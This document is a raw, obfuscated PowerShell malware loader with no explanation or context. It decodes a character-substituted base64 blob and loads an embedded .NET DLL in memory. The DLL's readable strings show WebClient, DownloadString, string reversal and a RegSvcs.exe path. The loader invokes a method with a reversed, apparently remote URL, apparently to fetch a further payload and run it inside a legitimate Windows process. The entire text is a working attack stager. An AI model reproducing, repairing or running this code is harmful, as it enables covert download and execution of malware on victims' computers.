'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?? oLg?? ?? CqIlFwgoM?? ?? ?? CqJvN?? ?? ?? CiYqNgIDKDU?? ?? ?? ooNg?? ?? Cioe?? ig3?? ?? ?? KKi7QCQ?? ?? ?? igi?? ?? ?? KKh4CKDg?? ?? ?? oq?? ?? ?? ?? Ez?? B?? BQ?? ?? ?? ?? C?? ?? ?? R?? owF?? ?? ?? bLQgo?? Q?? ?? Kwor?? gIKBioi?? /4VBQ?? ?? Gyoe?? ign?? ?? ?? KKg?? ?? ?? BMw?? g?? o?? ?? ?? ?? ?? w?? ?? EQJ7Og?? ?? Cm87?? ?? ?? KCgaMC?? ?? ?? Gy0SK?? I?? ?? CsK?? ns6?? ?? ?? KBm88?? ?? ?? KBipK?? ign?? ?? ?? K?? nM9?? ?? ?? KfTo?? ?? ?? oq?? EJTSkIB?? ?? E?? ?? ?? ?? ?? ?? ?? w?? ?? ?? B2NC4wLjMwMzE5?? ?? ?? ?? ?? ?? U?? b?? ?? ?? ?? MwH?? ?? ?? jfg?? ?? O?? g?? ?? BQI?? ?? ?? jU3RyaW5ncw?? ?? ?? ?? BME?? ?? ?? O?? E?? ?? CNVUwCEEQ?? ?? E?? ?? ?? ?? CNHVUlE?? ?? ?? ?? lBE?? ?? CQE?? ?? ?? jQmxvYg?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? BVxWiCQkP?? ?? ?? ?? +gEz?? BY?? ?? ?? E?? ?? ?? ?? u?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? Z?? ?? ?? ?? BQ?? ?? ?? D0?? ?? ?? B?? ?? ?? ?? ?? ?? w?? ?? ?? ?? U?? ?? ?? ?? J?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? B?? ?? ?? ?? ?? w?? ?? ?? ?? E?? ?? ?? ?? C?? ?? ?? ?? ?? w?? ?? ?? ?? I?? ?? ?? ?? ?? ?? IkE?? Q?? ?? ?? ?? ?? ?? BgBC?? 98GBgCv?? 98GBg?? Z?? i?? GDwBDBw?? ?? BgBa?? ioFBg?? l?? yoFBgCW?? yoFBgBi?? yoFBgB7?? yoFBgCh?? ioFBgBG?? pkGBgDC?? ZkGBgDt?? ioFBgC8?? gYECgDl?? d?? FCgCS?? XMECg?? t?? nMEDgBf?? W8GDg?? ?? BjMGBgDV?? i?? GDgBx?? rgGDgCJ?? ns?? BgCYB5YEDgDsBW8GDg?? K?? 3s?? Bg?? n?? ZYEDg?? B?? EkECgDQ?? akEBgD8?? S?? GBgCn?? d8GBgD?? Bf8GBgBHBRUFCgBv?? Q?? FBg?? ?? ?? ZYEBgD4ByoFCgB6?? Q?? FCgD?? B6kHBgD9?? 9IHDgBSB3s?? BgBCBJYEBgDGBJYEBgDKB5YEBg?? 8BSoFBgBU?? SoFBgCCB98GBg?? JBpYE?? ?? ?? ?? ?? Dc?? ?? ?? ?? ?? ?? ?? E?? ?? Q?? ?? ?? ?? ?? ?? 8gToB0k?? ?? Q?? B?? ?? ?? ?? ?? ?? D+BegHTQ?? B?? ?? I?? ?? ?? EQ?? J8H6?? dd?? ?? E?? ?? w?? ?? ?? Q?? ?? H?? cQB10?? BQ?? I?? ?? ?? BE?? BnB+gHhQ?? H?? ?? s?? ?? ?? E?? ?? ?? EI6?? dd?? ?? g?? Dg?? B?? ?? ?? ?? 8?? NTBV0?? C?? ?? P?? ?? UB?? ?? BhBg?? ?? XQ?? I?? BE?? BQE?? ?? B?? ?? ?? ?? Bd?? ?? g?? G?? ?? x?? IUFJgEx?? FwFLgEx?? H?? FNgEx?? J4FPgER?? J0ERgER?? EQBSgER?? NQ?? TwEh?? N4H9wBQI?? ?? ?? ?? ?? ?? GGBMGBg?? B?? Fgg?? ?? ?? ?? ?? ?? YYEwYG?? ?? E?? YC?? ?? ?? ?? ?? ?? ERgZBlMB?? QCKI?? ?? ?? ?? ?? ?? TCPEFVwEB?? JYg?? ?? ?? ?? ?? BMI4gRc?? QE?? oi?? ?? ?? ?? ?? ?? EwjoBWEB?? QCuI?? ?? ?? ?? ?? ?? TCFEGZgEB?? Log?? ?? ?? ?? ?? BMIv?? Vr?? QE?? 7C?? ?? ?? ?? ?? ?? Ewgs?? X?? B?? QDzI?? ?? ?? ?? ?? ?? TCDgBdgEB?? Psg?? ?? ?? ?? ?? BEYGQZT?? QI?? ESE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? ZIQ?? ?? ?? ?? ?? WCLQHfQEC?? C?? h?? ?? ?? ?? ?? BMIWgd9?? QI?? JyE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? wIQ?? ?? ?? ?? ?? W?? Gk?? ggEC?? PMh?? ?? ?? ?? ?? MYCewfL?? ?? M?? ?? SI?? ?? ?? ?? ?? xgLt?? N?? ?? B?? ?? JIg?? ?? ?? ?? CD?? CQBhwEE?? BUi?? ?? ?? ?? ?? MYCQ?? TU?? ?? Q?? ICI?? ?? ?? ?? ?? EQBW?? IwBB?? B?? Ig?? ?? ?? ?? ?? B?? EI?? l?? EF?? Eki?? ?? ?? ?? ?? ?? YYEwYG?? ?? Y?? VCI?? ?? ?? ?? ?? ?? wjE?? Eo?? BgCIIg?? ?? ?? ?? ?? GGBMGBg?? G?? ?? ?? ?? ?? QDq?? w?? ?? ?? Q?? r?? ?? ?? ?? ?? QBRBQ?? ?? ?? QDk?? ?? ?? ?? ?? QDk?? ?? k?? EwYB?? BE?? EwYG?? Bk?? EwYK?? Ck?? EwYQ?? DE?? EwYQ?? Dk?? EwYQ?? EE?? EwYQ?? Ek?? EwYQ?? FE?? EwYQ?? Fk?? EwYV?? GE?? EwYQ?? Gk?? EwYQ?? HE?? EwYQ?? Hk?? EwYa?? Ik?? EwYg?? KE?? EwYG?? Kk?? EwYG?? LE?? EwYG?? Mk?? EwYm?? OE?? EwYQ?? Ok?? EwYG?? PE?? EwYG?? JE?? EwYG?? Jk?? EwYG?? ?? w?? EwYG?? BQ?? EwYG?? Bw?? EwYG?? CQ?? EwYG?? ?? w?? x?? BK?? BQ?? x?? BK?? Bw?? x?? BK?? CQ?? x?? BK?? Lk?? cgdP?? NE?? EgFV?? NE?? 9?? dd?? Pk?? EwZj?? CEBlgBr?? ?? kBEwYG?? Lk?? EwYG?? CkBEwYG?? DEBLgB7?? CkB+QOB?? DkBhwGI?? CkBMQSN?? EEBrQCS?? EEBkQeY?? EkB0?? Se?? FEBI?? Sk?? EkBkQCq?? BkBJ?? Gy?? NE?? owC4?? GEB+QC/?? GkB4QPG?? Lk?? ewfL?? Lk?? 7QDQ?? Lk?? Q?? TU?? HEBtQDg?? DQ?? 3gf3?? Dw?? zQNK?? Dw?? 1wMO?? Tw?? EwYG?? Ck?? owDM?? y4?? CwDF?? S4?? EwDO?? S4?? GwDt?? S4?? IwD2?? S4?? KwD2?? S4?? MwD2?? S4?? OwD2?? S4?? Qw?? E?? i4?? Sw?? c?? i4?? Uw?? c?? i4?? Ww?? i?? i4?? YwBM?? i4?? awBZ?? k?? ?? gwCn?? k?? ?? ewCs?? kM?? cwC1?? kM?? ewCs?? kk?? owDd?? 2M?? cwC1?? mM?? ewCs?? mk?? owDx?? 4?? ?? gwCn?? oM?? iwCn?? oM?? kwCn?? oM?? cwC1?? ok?? owD+?? 6?? ?? gwCn?? qM?? iwCn?? qM?? cwDO?? qM?? qwCn?? qM?? swCn?? qM?? kwCn?? qk?? ewDt?? c?? ?? gwCn?? sM?? swCn?? sM?? cw?? Q?? 8M?? ewDt?? ck?? ewDt?? e?? ?? gwCn?? uM?? iwCn?? uM?? kwCn?? uM?? qwCn?? uM?? swCn?? gkBow?? SBCMBewCs?? iMBmwBq?? 0MBewCs?? kMBUw?? c?? i?? CewCs?? i?? CgwCn?? k?? CewCs?? k?? CgwCn?? m?? CewCs?? m?? CgwCn?? o?? CewCs?? o?? CgwCn?? q?? CgwCn?? s?? CgwCn?? u?? CgwCn?? u?? CewCs?? g?? DgwCn?? i?? DgwCn?? i?? DewCs?? nQ?? 2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? uMC4w?? ?? BZ?? QBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE3Lj?? uMy4w?? ?? Bh?? Q?? 0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw?? ?? ?? B?? B?? ?? tNeS5Db21wdXRlcg?? ?? EwE?? Dk15LkFwcGxpY2F0aW9u?? ?? ?? M?? Q?? HTXkuVXNlcg?? ?? EwE?? Dk15LldlYlNlcnZpY2Vz?? ?? ?? Q?? Q?? LTXkuU2V0dGluZ3M?? ?? ?? C0?? ?? ?? ?? zsrvvgE?? ?? ?? CR?? ?? ?? ?? bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj?? sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT?? 4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FBBRFBBRFC0?? ?? ?? ?? ?? ?? ?? ?? ?? H6xN+k?? ?? ?? ?? ?? ?? g?? ?? ?? Gk?? ?? ?? BEOQ?? ?? RBs?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BSU0RTz7YbjMR2n0y4xJgHLeBcd?? E?? ?? ?? BEOlxIYWNraW5nXENyeXB0ZXJzIE1vZGRpbmdcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXGxwT1VwbE1wLnBkYgDVOQ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DvOQ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4Tk?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? /yU?? I?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 